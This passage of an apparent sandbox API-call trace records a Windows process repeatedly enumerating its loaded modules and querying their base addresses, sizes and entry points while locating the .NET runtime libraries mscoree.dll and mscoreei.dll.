lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.287] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.287] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.287] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.287] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.288] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.288] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.288] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.289] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.289] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.289] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.290] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.290] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.291] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.296] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18f2a4, cb=0xc | out: lpmodinfo=0x18f2a4*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.297] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x754f0000, lpBaseName=0x18f09c, nSize=0x104 | out: lpBaseName="mscoree.dll") returned 0xb [0107.380] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.395] GetCurrentProcess () returned 0xffffffff [0107.395] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d98c, cb=0x1000, lpcbNeeded=0x18eba0 | out: lphModule=0x18d98c, lpcbNeeded=0x18eba0) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.396] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.397] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.397] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.397] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.397] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.398] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.398] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.398] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.399] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.399] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.400] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.400] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.401] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.402] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.402] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.403] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.403] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.404] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.404] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.405] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.405] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.406] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.407] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.407] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.408] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.409] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.409] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.410] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.411] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18e98c, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.412] GetCurrentProcess () returned 0xffffffff [0107.412] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d998, cb=0x1000, lpcbNeeded=0x18ebac | out: lphModule=0x18d998, lpcbNeeded=0x18ebac) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.413] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.414] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.414] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.414] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.414] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.415] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.415] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.415] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.416] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.416] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.416] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.417] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.418] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.418] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.419] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.419] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.420] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.420] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.421] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.421] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.422] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.422] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.423] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.424] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.424] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.425] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.426] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.426] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18eba0, cb=0xc | out: lpmodinfo=0x18eba0*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.427] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18e998, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.430] GetCurrentProcess () returned 0xffffffff [0107.430] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d98c, cb=0x1000, lpcbNeeded=0x18eba0 | out: lphModule=0x18d98c, lpcbNeeded=0x18eba0) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.431] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.436] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.437] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.438] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.442] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.442] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.442] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.443] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.443] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.443] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.444] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.444] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.444] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.445] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.445] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.446] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.446] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.447] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.447] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.448] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.448] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.449] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.449] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18eb94, cb=0xc | out: lpmodinfo=0x18eb94*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.450] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18eb94, cb=0xc | out: 